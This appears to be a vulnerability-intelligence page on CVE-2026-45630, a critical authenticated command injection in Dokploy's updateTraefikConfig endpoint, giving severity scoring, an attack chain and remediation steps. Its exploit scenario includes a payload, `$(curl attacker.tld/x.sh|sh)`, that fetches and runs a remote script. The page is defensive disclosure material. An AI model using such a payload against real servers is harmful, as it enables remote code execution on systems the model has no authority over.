What is the CVSS score of CVE-2026-45630?

CVE-2026-45630 has a CVSS 3.1 base score of 9.0 (Critical). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:L. EPSS exploitation probability: 0.2%.

Which versions of Dokploy are affected by CVE-2026-45630?

Dokploy versions 0.28.8 and earlier contain a critical authenticated command injection vulnerability in the server configuration endpoint that allows privileged users (admins/owners) to execute…

How to fix or mitigate CVE-2026-45630?

24 hours: Audit Dokploy admin/owner account access logs and credential rotation status; enumerate all systems each account can reach. 7 days: Implement network-level restrictions on the Dokploy controller's access to managed servers; disable or revoke unnecessary privileged accounts; enable audit logging on tRPC updateTraefikConfig endpoint calls. 30 days: Subscribe to Dokploy security advisories; establish emergency patching procedures for when vendor patch becomes available.

Dokploy CVE-2026-45630

EUVD-2026-33357 CRITICAL

OS Command Injection (CWE-78)

2026-05-29 GitHub_M

Command Injection Dokploy

9.0

CVSS 3.1 · GitHub Advisory

Severity by source

GitHub Advisory PRIMARY

9.0 CRITICAL

AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:L

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:L

Attack Vector

Network

Attack Complexity

Low

Privileges Required

High

User Interaction

None

Scope

Changed

Confidentiality

High

Integrity

High

Availability

Low

Lifecycle Timeline

Analysis Generated

May 29, 2026 - 17:54 vuln.today

DescriptionGitHub Advisory

Dokploy is a free, self-hostable Platform as a Service (PaaS). In 0.28.8 and earlier, authenticated OS command injection in the application.updateTraefikConfig tRPC endpoint allows admin/owner users to execute arbitrary system commands on remote servers via unsanitized echo shell interpolation.

AnalysisAI

Authenticated OS command injection in Dokploy 0.28.8 and earlier lets admin or owner users execute arbitrary shell commands on remote servers managed by the PaaS through the application.updateTraefikConfig tRPC endpoint. The flaw stems from unsanitized shell interpolation in an echo call, granting full command execution across any host the Dokploy controller manages. …

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access

Obtain Dokploy admin/owner credentials

Delivery

Authenticate to tRPC API

Exploit

Send crafted updateTraefikConfig payload with shell metacharacters

Execution

Injected command runs via echo interpolation

Persist

Code executes on managed remote servers

Impact

Pivot across deployment fleet

Access

Obtain Dokploy admin/owner credentials

Delivery

Authenticate to tRPC API

Exploit

Send crafted updateTraefikConfig payload with shell metacharacters

Execution

Injected command runs via echo interpolation

Persist

Code executes on managed remote servers

Impact

Pivot across deployment fleet

Vulnerability AssessmentAI

Exploitation	Exploitation requires (1) network reachability to the Dokploy control plane's tRPC API, (2) valid authenticated credentials or a live session for an account with admin or owner role in Dokploy - regular users cannot reach updateTraefikConfig - and (3) Dokploy at version 0.28.8 or earlier running the vulnerable echo-based Traefik config update path. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment	Risk signals are mixed but lean toward high-priority for any organization running Dokploy. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An attacker who has phished a Dokploy admin's session or compromised an owner account submits a crafted Traefik configuration through the application.updateTraefikConfig tRPC call containing shell metacharacters such as `$(curl attacker.tld/x.sh\|sh)`. When Dokploy interpolates that input into its echo-based configuration push, the injected command executes on each managed remote server, giving the attacker code execution across the entire fleet. …
Remediation	Upgrade to the fixed Dokploy release referenced in GHSA-p787-6gqg-cvp5 (https://github.com/Dokploy/dokploy/security/advisories/GHSA-p787-6gqg-cvp5); the advisory is the authoritative source for the exact patched version, which was not independently confirmed in the input data, so consult the advisory before deploying. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

24 hours: Audit Dokploy admin/owner account access logs and credential rotation status; enumerate all systems each account can reach. …

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2026-45630 vulnerability details – vuln.today

Back

Dokploy CVE-2026-45630

Severity by source

CVSS VectorGitHub Advisory

Lifecycle Timeline

DescriptionGitHub Advisory

AnalysisAI

Unlock full vulnerability intelligence

Attack ChainAIDerived

Vulnerability AssessmentAI

Recommended ActionAI

Share

External POC / Exploit Code